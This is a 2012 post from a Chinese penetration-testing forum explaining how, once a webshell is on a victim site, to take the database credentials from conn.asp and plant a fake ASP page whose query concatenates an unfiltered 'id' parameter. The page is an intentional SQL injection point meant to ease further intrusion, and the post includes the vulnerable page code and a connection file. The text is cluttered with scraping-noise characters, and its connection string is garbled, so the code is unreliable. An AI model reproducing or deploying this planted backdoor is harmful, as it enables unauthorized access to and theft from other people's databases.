中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵, J: [: d% [8 P; W

+ S1 s  s" ^+ q: c, v5 \8 K3 D今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
: T, c$ H9 J. V6 Y7 R% d, T
' B9 {: l9 K/ Z. x5 v- N这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!# }* |; [/ f. ^1 D. A# j; Q: X

) j4 O5 j5 j& ]2 ]/ L首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和: s0 q* G. ^6 s/ k

( i5 a. F" t) H. p密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
6 U2 E, Q. ?+ t% z1 m% a
6 @1 t# F% Q1 I  m  t) K因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
9 I7 H) a0 _1 f
0 ~5 \4 ~5 k* W8 Q6 w程序代码
  N( _* g$ l' [/ w. h- s0 \<!--#include file="xx.asp"-->
& V+ h1 P7 T7 ?, E6 `<%
" k, w7 }7 n; I2 L+ |# r- iset rs=server.createobject("ADODB.recordset")! S, n/ W% h. ?% G' T: H
id = request("id")9 G6 \- S3 T) j" a2 {, K
strSQL = "select * from admin where id=" & id
0 E6 Y7 a3 ^. s, k4 N+ U) trs.open strSQL,conn,1,3
  o" Y* `. u- U. P2 ]) `- B* b2 @rs.close  U. c& X: Q4 c& S
%>
1 h1 ]8 g8 x3 E5 V0 y( T2 j  O$ O9 f$ j: X
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在* J) f* H/ F9 N5 w0 U
0 h3 x) g! q) H! Z7 A
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
8 e/ l+ t' P5 Y) T
0 I9 N/ \7 U3 A  z+ e然后就要构造一个连接数据库的文件了,代码如下:' j& m* d( Y/ H& S
程序代码
7 E7 d* P( z  y* W<%        
5 j9 R% H5 ]$ h' BstrSQLServerName = "000.000.000.000"     '服务器名称或地址
' G$ I+ S, P/ DstrSQLDBUserName = "sqlname"         '数据库帐号; z3 u5 x+ P- Q  P. ~
strSQLDBPassword = "sqlpass"         '数据库密码+ y3 D7 ?/ p* J4 i
strSQLDBName = "sqldataname"           '数据库名称" E+ }+ u5 T5 h+ J
Set conn = Server.CreateObject("ADODB.Connection")) [; Q" ]' L4 n9 H3 b% k  I' F
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";", A2 ^/ w  O7 M
conn.open strCon& k4 ?9 l1 G3 d& v2 C# {
%>
: W  N, ?# C9 K. \5 z7 _; s, n, s9 _& Z; h; E
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
. j2 C# Y! E, I* @/ P" L; c" r9 T5 w
就这样,正常情况下,就OK了,伪造成功……
1 h! Q9 ^* e' \% O2 o; n
" T( o3 a9 }2 z' r! B; Y           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2